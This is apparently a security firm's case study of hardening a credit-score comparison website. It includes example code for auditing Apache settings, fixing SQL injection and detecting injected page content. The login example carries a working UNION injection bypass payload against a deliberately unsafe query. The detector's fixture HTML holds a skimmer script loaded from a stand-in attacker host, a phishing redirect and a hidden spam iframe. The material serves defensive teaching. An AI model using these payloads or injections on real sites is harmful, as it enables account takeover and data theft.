A case study of our vulnerability assessment and mitigation process for a website that partnered with a credit bureau.

Executive Summary

  • Our client operated a website that partnered with a credit bureau to provide credit score analysis and comparison services, and needed assurance that the personal financial data it handled was protected from attackers.
  • We conducted a comprehensive evaluation of their system, network, and core components using a mix of automated scanners and manual testing.
  • We identified and fixed vulnerabilities in the web layer, application layer, database, DNS server, firewall configuration, and inbound and outbound traffic handling.
  • We delivered reports with test results and remediation guidance, and set up ongoing monitoring of the website for suspicious changes.
  • The result was a hardened website that met the client's security requirements, with every vulnerability we identified remediated and verified by a final penetration test.

Introduction

Website security is a major concern for any business that deals with sensitive information. A simple security loophole could jeopardize the entire operation and hurt the business’s credibility. Therefore, it is essential to conduct regular cybersecurity vulnerability assessments to detect and fix any weaknesses in the system.

In this case study, we will describe how we helped our client secure their website from hackers using our 4-step process of mitigating risk.

Case & Client Profile

Our client was a website that partnered with a credit bureau to provide services related to analyzing and comparing credit scores. Due to the nature of the data involved, the client wanted to ensure complete safety and protection from vulnerabilities and possible attacks.

Challenges and Objectives

The client asked us to perform a complete evaluation of their system, network, and all related core components. The engagement involved detailed penetration testing to find weaknesses in the infrastructure and application, followed by regression testing after remediation to confirm that the fixes held.

Our objective was to deliver a website that met the required security standards, with the identified vulnerabilities remediated and verified.

Tools & Technologies Used

To complete this process, we used the following tools (Apache HTTP Server and NetScaler are components of the client's deployment that we hardened, rather than assessment tools):

  • Apache HTTP Server (the client's web server)
  • Detectify
  • Citrix NetScaler AppFirewall
  • OnWebChange
  • OWASP ZAP
  • Quttera
  • Vega
  • Veracode Scan
  • W3af

How We Solved the Situation

We followed our 4-step process of mitigating risk to secure the client's website:

1. Evaluate: We used the tools to evaluate the following elements of the website:

  • Database
  • DNS Server
  • Firewalls
  • Incoming Traffic
  • Outgoing Traffic
  • Source Code

We based our analysis on the most common techniques used by hackers, such as:

  • Backdoor exploitation
  • Brute Force Attacks
  • Defacement
  • Malware
  • Misconfiguration
  • Phishing
  • SEO Spam
  • Vulnerable Code
  • Vulnerable Extensions and Plugins

2. Fix: During the analysis, we found several instances of injected code in the web application's source that altered its behaviour for the attacker's purposes. We removed the injected code entirely and then applied fixes at the web layer and the application layer.

For the web layer, we replaced the existing firewall with Citrix NetScaler AppFirewall, a web application firewall that combines signature-based checks with a positive-security (learned allow-list) model, which gives the application some defense against attack patterns that do not yet have a signature.

We also removed unneeded network services such as telnet and FTP from the host running the Apache HTTP Server, restricted ICMP (ping) to it, and enabled firewall monitoring of incoming and outgoing traffic. We then checked and hardened the web server for issues such as:

  • Clickjacking (no X-Frame-Options or frame-ancestors policy)
  • Directory listing enabled
  • Discoverable hidden directories
  • Unmasked non-public personal information (NPI) in responses
  • Weak SSL/TLS configuration
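The three web-server items that are purely configuration (directory listing, clickjacking headers, weak TLS) can be checked mechanically before and after hardening. The following is an added example, not code from the engagement or from TechForing: it holds a constructed weak Apache fragment next to its hardened equivalent and a small auditor that flags the weak settings. The configuration text, host paths and header values are assumptions chosen for illustration.

```python
# Constructed Apache httpd.conf fragments (assumption: illustrative, not the
# client's real configuration). The first carries the weaknesses listed
# above; the second is the hardened equivalent.
WEAK_CONFIG = """
ServerTokens Full
<Directory "/var/www/html">
    Options Indexes FollowSymLinks
    AllowOverride None
</Directory>
SSLEngine on
SSLProtocol all
"""

HARDENED_CONFIG = """
ServerTokens Prod
ServerSignature Off
<Directory "/var/www/html">
    Options -Indexes +FollowSymLinks
    AllowOverride None
</Directory>
SSLEngine on
SSLProtocol -all +TLSv1.2 +TLSv1.3
SSLCipherSuite HIGH:!aNULL:!MD5:!RC4
Header always set X-Frame-Options "SAMEORIGIN"
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure
"""

LEGACY_PROTOCOLS = {"sslv3", "tlsv1", "tlsv1.1"}
ALL_PROTOCOLS = LEGACY_PROTOCOLS | {"tlsv1.2", "tlsv1.3"}


def _directives(config):
    """Yield (name, args) per directive line, skipping comments and <Section> tags."""
    for raw in config.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<"):
            continue
        name, _, args = line.partition(" ")
        yield name.lower(), args.strip()


def enabled_protocols(ssl_protocol_args):
    """Apply Apache's +/- SSLProtocol syntax; a missing directive means the default 'all'."""
    if ssl_protocol_args is None:
        ssl_protocol_args = "all"
    enabled = set()
    for token in ssl_protocol_args.split():
        sign, name = (token[0], token[1:]) if token[0] in "+-" else ("+", token)
        names = ALL_PROTOCOLS if name.lower() == "all" else {name.lower()}
        enabled = enabled | names if sign == "+" else enabled - names
    return enabled


def audit_apache_config(config):
    """Return a list of findings; an empty list means none of the checks fired."""
    findings = []
    ssl_protocol = None
    has_frame_header = False
    cookies_hardened = False
    for name, args in _directives(config):
        if name == "options":
            # "Indexes" or "+Indexes" turns directory listing on; "-Indexes" turns it off.
            if any(opt.lstrip("+") == "Indexes" for opt in args.split()):
                findings.append("directory listing enabled (Options Indexes)")
        elif name == "servertokens" and args.lower() != "prod":
            findings.append(f"server version disclosed (ServerTokens {args})")
        elif name == "sslprotocol":
            ssl_protocol = args
        elif name == "header":
            parts = args.split()
            if parts and parts[0] == "always":
                parts = parts[1:]
            if len(parts) >= 2 and parts[0] == "set" and parts[1].lower() == "x-frame-options":
                has_frame_header = True
            if (len(parts) >= 2 and parts[0] == "edit" and parts[1].lower() == "set-cookie"
                    and "HttpOnly" in args and "Secure" in args):
                cookies_hardened = True
    legacy = enabled_protocols(ssl_protocol) & LEGACY_PROTOCOLS
    if legacy:
        findings.append("weak TLS configuration: " + ", ".join(sorted(legacy)) + " enabled")
    if not has_frame_header:
        findings.append("clickjacking: no X-Frame-Options header set")
    if not cookies_hardened:
        findings.append("Set-Cookie not forced to HttpOnly; Secure")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_apache_config(cfg))
```

The auditor deliberately treats an absent SSLProtocol directive as the Apache default ("all"), because that is the case most often missed: the server looks unconfigured rather than misconfigured, yet still negotiates TLS 1.0 and 1.1.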

As for the application layer, we evaluated it against the OWASP (Open Web Application Security Project) Top 10 and found issues such as:

  • Cookies referenced from client-side JavaScript
  • Cross-site scripting (XSS)
  • CRLF injection
  • Email spoofing
  • HttpOnly attribute not set on cookies
  • Invalid HTML content
  • SQL injection
  • Login sessions sent over unencrypted HTTP
  • Unrestricted file upload
  • Weak password policy
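SQL injection in a login path is the most consequential item on that list for a site holding credit data, and the fix is mechanical: bind user input as a parameter instead of splicing it into SQL text. The following is an added example, not the client's code or anything from the engagement: a constructed in-memory SQLite users table, the vulnerable login beside the parameterised one, and a UNION payload that shows why hashing passwords on its own does not stop the bypass. Table layout, account name and the PBKDF2 iteration count are assumptions.

```python
import hashlib
import hmac
import sqlite3

ITERATIONS = 50_000  # assumption: low enough to run quickly in a demo


def hash_password(password, salt):
    """PBKDF2-HMAC-SHA256, hex encoded; the per-user salt is stored beside the hash."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ITERATIONS).hex()


def make_db():
    """Constructed in-memory users table with one account (not the client's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt TEXT, pw_hash TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("alice", "s4lt-alice", hash_password("correct horse battery staple", "s4lt-alice")),
    )
    conn.commit()
    return conn


def _verify(row, password):
    """Constant-time comparison of the stored hash against a fresh one."""
    if row is None:
        return False
    _username, salt, stored = row
    return hmac.compare_digest(stored, hash_password(password, salt))


def login_vulnerable(conn, username, password):
    """The 'before' form: the username is spliced into the SQL text (deliberately unsafe)."""
    query = f"SELECT username, salt, pw_hash FROM users WHERE username = '{username}'"
    return _verify(conn.execute(query).fetchone(), password)


def login_fixed(conn, username, password):
    """The 'after' form: the driver sends the username as data, never as SQL."""
    row = conn.execute(
        "SELECT username, salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    return _verify(row, password)


def union_bypass_payload(password):
    """A username that makes the string-built query return an attacker-chosen row.

    The attacker picks the salt and supplies a hash of their own password, so the
    application's hash check passes even though no such account exists.
    """
    salt = "attacker-salt"
    return f"nobody' UNION SELECT 'nobody', '{salt}', '{hash_password(password, salt)}' --"


if __name__ == "__main__":
    db = make_db()
    payload = union_bypass_payload("anything")
    print("vulnerable, injected:", login_vulnerable(db, payload, "anything"))
    print("fixed, injected:     ", login_fixed(db, payload, "anything"))
```

With the payload in place the vulnerable query reads `... WHERE username = 'nobody' UNION SELECT 'nobody', 'attacker-salt', '<hash>' --'`; the trailing `--` comments out the closing quote, and the UNION row satisfies the hash check. The parameterised version receives the entire payload as a literal username, finds no such row, and refuses the login.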

We created a report that contained the test results and possible solutions and provided it to the client.

3. Scan: After fixing the vulnerabilities found, we rescanned the site with OWASP ZAP, W3af, Vega, Quttera, and Detectify to confirm the fixes and look for anything missed. We also started monitoring the website with OnWebChange for unexpected changes to its pages; it can alert by email, Pushover, or an HTTP callback.
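The injected code found in step 2 and the change monitoring set up in step 3 are two sides of the same control: keep an approved baseline of each page and raise an alert when the live copy gains scripts, iframes or content it did not have. The following is an added example of that logic, not OnWebChange's implementation and not the client's code: a constructed clean page, a copy carrying the kinds of injection the engagement describes (a foreign script, an inline redirect, a hidden iframe), and a checker that reports the differences. The host names and page markup are assumptions.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site is allowed to load scripts from (assumption: illustrative names).
ALLOWED_SCRIPT_HOSTS = {"cdn.example-client.test", "www.example-client.test"}

# Constructed sample pages (not the client's real markup).
BASELINE_HTML = """<html><head><title>Compare your credit score</title>
<script src="https://cdn.example-client.test/app.js"></script>
</head><body><h1>Compare your credit score</h1>
<script>window.appVersion = "3.2";</script>
</body></html>"""

INJECTED_HTML = """<html><head><title>Compare your credit score</title>
<script src="https://cdn.example-client.test/app.js"></script>
<script src="https://evil.example/skim.js"></script>
</head><body><h1>Compare your credit score</h1>
<script>window.appVersion = "3.2";</script>
<script>document.location = "https://evil.example/phish";</script>
<iframe src="https://evil.example/seo-spam" style="display:none"></iframe>
</body></html>"""


class _Collector(HTMLParser):
    """Collects every <script> (src or inline body) and every <iframe src>."""

    def __init__(self):
        super().__init__()
        self.scripts = []   # (src or None, inline body)
        self.iframes = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script, self._src, self._buf = True, attrs.get("src"), []
        elif tag == "iframe":
            self.iframes.append(attrs.get("src", ""))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._in_script = False


def fingerprint(html):
    """SHA-256 of the page body: the cheapest first alarm for any change."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def page_findings(baseline_html, current_html):
    """Compare a fetched page against its approved baseline and list suspicious changes."""
    findings = []
    if fingerprint(current_html) != fingerprint(baseline_html):
        findings.append("content hash changed since baseline")
    base, cur = _Collector(), _Collector()
    base.feed(baseline_html)
    cur.feed(current_html)
    known_scripts = set(base.scripts)
    for src, body in cur.scripts:
        if (src, body) in known_scripts:
            continue  # unchanged script already in the approved baseline
        if src:
            host = urlparse(src).hostname or ""
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(f"script loaded from unapproved host: {host}")
            else:
                findings.append(f"new script on approved host: {src}")
        else:
            findings.append(f"new inline script: {body[:60]}")
    for src in cur.iframes:
        if src not in base.iframes:
            findings.append(f"new iframe: {src}")
    return findings


if __name__ == "__main__":
    for finding in page_findings(BASELINE_HTML, INJECTED_HTML):
        print("ALERT:", finding)
```

A hash mismatch alone fires on every legitimate deployment, which is why the structural comparison matters: the script and iframe findings are what an on-call engineer can act on, and a release that only changes copy produces nothing beyond the hash notice.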

4. Test: After all identified vulnerabilities were fixed, we ran a final manual penetration test covering the entire website from a security standpoint. It surfaced a few more minor issues, which we documented in a second report and handed to the client for immediate remediation.

Results

The client was highly satisfied with our vulnerability assessment services. Once we completed our process, their website met the agreed security standards, and every vulnerability we had identified was remediated and verified. They appreciated our efficiency and professionalism in securing a website that handles sensitive financial data.

Conclusion

This case study showed how we secured a website handling sensitive data using our 4-step process of mitigating risk: we evaluated, fixed, scanned, and tested the website for vulnerabilities using a range of tools and techniques.

After completing the tests, we provided the client with reports containing the test results and solutions, and we set up monitoring for further suspicious changes. In the end, the website met the required security standards with the identified vulnerabilities remediated.

This case study shows the importance of conducting regular cybersecurity vulnerability assessments to protect websites and data from attackers.

TechForing Cybersecurity Vulnerability Assessment Service

TechForing provides a white-glove cybersecurity service that includes vulnerability assessment and penetration testing. It applies both to you as an individual and to the digital assets of your organization. Just email us or contact us, and you can learn more from our other case studies.
